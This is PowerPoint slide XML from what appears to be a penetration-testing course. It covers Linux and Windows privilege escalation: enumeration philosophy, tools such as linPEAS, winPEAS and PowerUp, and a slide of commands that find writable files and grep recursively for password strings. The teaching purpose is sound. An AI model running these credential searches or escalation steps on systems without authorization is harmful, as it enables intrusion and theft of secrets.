          <a:xfrm>
            <a:off x="1219200" y="2825101"/>
            <a:ext cx="5811520" cy="2673609"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D243364-FC3E-4BDB-BB86-1DBF6E7F117C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="8920" t="12174" r="9287"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4392584" y="3606756"/>
            <a:ext cx="6532880" cy="2504484"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C99FD2ED-4E38-41CC-9E8C-B2374E5EE10B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="4736580"/>
            <a:ext cx="1615440" cy="437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784123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3D372-415B-4325-B4E3-75C87D509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6FE292D-86FA-4A42-912F-7D4E42473B40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What Do I Have in My Pocket? (Continued)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C99B8E9-15F6-4A66-8C52-3ACC650654E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295399"/>
            <a:ext cx="11363325" cy="4394201"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Other Commands:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dpkg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> –l</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>find / -type f -writable 2&gt;/dev/null</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>find / -type f -perm /222 2&gt;/dev/null</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>find &lt;directory&gt; -exec grep -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>RiIE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> "password strings"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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916FE282-5BF6-4B28-8413-D1E52C13CA1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="716347" y="4582157"/>
            <a:ext cx="10779774" cy="944882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0963B10-C4BB-4FDC-8DF6-05350CB0715C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3454651" y="5522363"/>
            <a:ext cx="52826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One of many </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>linPEAS</a:t>
            </a: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 password searches</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10142350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EAAED-D2BF-438F-8DCB-F5D3C92EC1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82FDFD6-9BCF-4465-878D-B64DD7FD9EEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Wrap-Up</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA253DCA-DC27-4F18-BC97-DAF58CCB7C5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="5986462" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Privilege Escalation can be hard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Requires even more knowledge/ familiarity than initial access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Get a checklist &amp; use tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>linPEAS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is often preferred</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make your own checklist to supplement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Secondary resources can help</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Udemy often has Tib3rius and TCM courses discounted for ~$15</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="A picture containing text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FD2BDA8-B737-412C-88BB-1D7794673708}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="16701" r="14629"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7318780" y="1595120"/>
            <a:ext cx="4459638" cy="3667760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11596082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a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>Questions?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2169432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B8001-CD78-6846-91F1-30431D512F70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="798439" y="1303655"/>
            <a:ext cx="10103340" cy="2009720"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Chapter 6:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows Privilege Escalation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4250515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CBD11B-49AB-450C-8399-EBF69253C10E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overview</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FE2540A-F81D-440C-B849-1EDF852385B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>General Philosophy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enumeration Paths</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Who Am I?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Where Am I?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What’s Going On?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Am I Alone?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What Do I Have in My Pocket?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2905782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816A9-A332-4E11-8F76-D98B4A3E13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0B55CE-57AA-405F-BFAD-70032C4A9719}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>General Philosophy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D81257D4-2922-4BDE-AAB0-E6B9C72798FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Goal: Gaining privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(First) Target might not always be ‘Administrator’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In the real world: get just enough for objective</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PrivEsc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is enumeration round 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Be methodical</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Take notes &amp; keep lists</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Biggest key: Know what’s common to spot the uncommon</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C5B4623-A75B-44AF-B915-AA929CF858F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7681802" y="1706772"/>
            <a:ext cx="3874024" cy="2439719"/>
            <a:chOff x="7681802" y="1706772"/>
            <a:chExt cx="3874024" cy="2439719"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="Picture 6" descr="A picture containing text, clipart&#10;&#10;Description automatically generated">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC8BEECF-2192-4ADB-87D7-E182E6F74C1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34" b="89956" l="5961" r="93715">
                          <a14:foregroundMark x1="6007" y1="32230" x2="6007" y2="32230"/>
                          <a14:foregroundMark x1="63909" y1="31236" x2="63909" y2="31236"/>
                          <a14:foregroundMark x1="67468" y1="53311" x2="67468" y2="53311"/>
                          <a14:foregroundMark x1="67930" y1="36424" x2="67930" y2="36424"/>
                          <a14:foregroundMark x1="78466" y1="48234" x2="78466" y2="48234"/>
                          <a14:foregroundMark x1="84011" y1="41943" x2="84011" y2="41943"/>
                          <a14:foregroundMark x1="93715" y1="35651" x2="93715" y2="35651"/>
                          <a14:foregroundMark x1="93484" y1="55740" x2="93484" y2="55740"/>
                          <a14:foregroundMark x1="62662" y1="68764" x2="62662" y2="68764"/>
                          <a14:foregroundMark x1="58457" y1="80905" x2="58457" y2="80905"/>
                          <a14:foregroundMark x1="60305" y1="20751" x2="60305" y2="20751"/>
                          <a14:foregroundMark x1="61691" y1="14349" x2="61691" y2="14349"/>
                          <a14:foregroundMark x1="63216" y1="13466" x2="63216" y2="13466"/>
                          <a14:foregroundMark x1="63447" y1="14128" x2="64972" y2="14128"/>
                          <a14:backgroundMark x1="17375" y1="46689" x2="17375" y2="46689"/>
                          <a14:backgroundMark x1="8549" y1="35872" x2="8549" y2="35872"/>
                          <a14:backgroundMark x1="37107" y1="43377" x2="37107" y2="43377"/>
                          <a14:backgroundMark x1="37477" y1="39735" x2="37477" y2="39735"/>
                          <a14:backgroundMark x1="37847" y1="37748" x2="37847" y2="37748"/>
                          <a14:backgroundMark x1="86553" y1="39514" x2="86553" y2="39514"/>
                        </a14:backgroundRemoval>
                      </a14:imgEffect>
                    </a14:imgLayer>
                  </a14:imgProps>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:srcRect r="26230"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7681802" y="1706772"/>
              <a:ext cx="3874024" cy="219862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588ACE0F-3BD6-4F72-80AD-60F607846E3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34" b="89956" l="5961" r="93715">
                          <a14:foregroundMark x1="6007" y1="32230" x2="6007" y2="32230"/>
                          <a14:foregroundMark x1="63909" y1="31236" x2="63909" y2="31236"/>
                          <a14:foregroundMark x1="67468" y1="53311" x2="67468" y2="53311"/>
                          <a14:foregroundMark x1="67930" y1="36424" x2="67930" y2="36424"/>
                          <a14:foregroundMark x1="78466" y1="48234" x2="78466" y2="48234"/>
                          <a14:foregroundMark x1="84011" y1="41943" x2="84011" y2="41943"/>
                          <a14:foregroundMark x1="93715" y1="35651" x2="93715" y2="35651"/>
                          <a14:foregroundMark x1="93484" y1="55740" x2="93484" y2="55740"/>
                          <a14:foregroundMark x1="62662" y1="68764" x2="62662" y2="68764"/>
                          <a14:foregroundMark x1="58457" y1="80905" x2="58457" y2="80905"/>
                          <a14:foregroundMark x1="60305" y1="20751" x2="60305" y2="20751"/>
                          <a14:foregroundMark x1="61691" y1="14349" x2="61691" y2="14349"/>
                          <a14:foregroundMark x1="63216" y1="13466" x2="63216" y2="13466"/>
                          <a14:foregroundMark x1="63447" y1="14128" x2="64972" y2="14128"/>
                          <a14:backgroundMark x1="17375" y1="46689" x2="17375" y2="46689"/>
                          <a14:backgroundMark x1="8549" y1="35872" x2="8549" y2="35872"/>
                          <a14:backgroundMark x1="37107" y1="43377" x2="37107" y2="43377"/>
                          <a14:backgroundMark x1="37477" y1="39735" x2="37477" y2="39735"/>
                          <a14:backgroundMark x1="37847" y1="37748" x2="37847" y2="37748"/>
                          <a14:backgroundMark x1="86553" y1="39514" x2="86553" y2="39514"/>
                        </a14:backgroundRemoval>
                      </a14:imgEffect>
                    </a14:imgLayer>
                  </a14:imgProps>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:srcRect l="73144" t="20714" b="37348"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="9117367" y="3001271"/>
              <a:ext cx="1751742" cy="1145220"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2986156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62BAD-B451-478A-BDCF-32BCA9825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0D21E32-D61B-4F33-B175-F935FD63613C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tool Options</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7661A968-4A24-4151-83DA-F7C5CB502481}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="6728141" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Know how to do manual enumeration, but for OSCP use tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lets you focus on spotting the opportunities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Options:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>winPEAS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (Brent’s favorite)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PowerUp.ps1 (similar, but less robust)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sherlock/Watson</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows Exploit Suggester (mostly kernel)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PowerView.ps1 (AD enumeration)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>accesschk.exe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Diagram&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D089E68D-D17B-4344-9A00-EC44EF23D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167" b="90000" l="1328" r="98125">
                        <a14:foregroundMark x1="19609" y1="23500" x2="19609" y2="23500"/>
                        <a14:foregroundMark x1="17891" y1="20000" x2="17891" y2="20000"/>
                        <a14:foregroundMark x1="14375" y1="28500" x2="18047" y2="14333"/>
                        <a14:foregroundMark x1="18047" y1="14333" x2="24453" y2="12833"/>
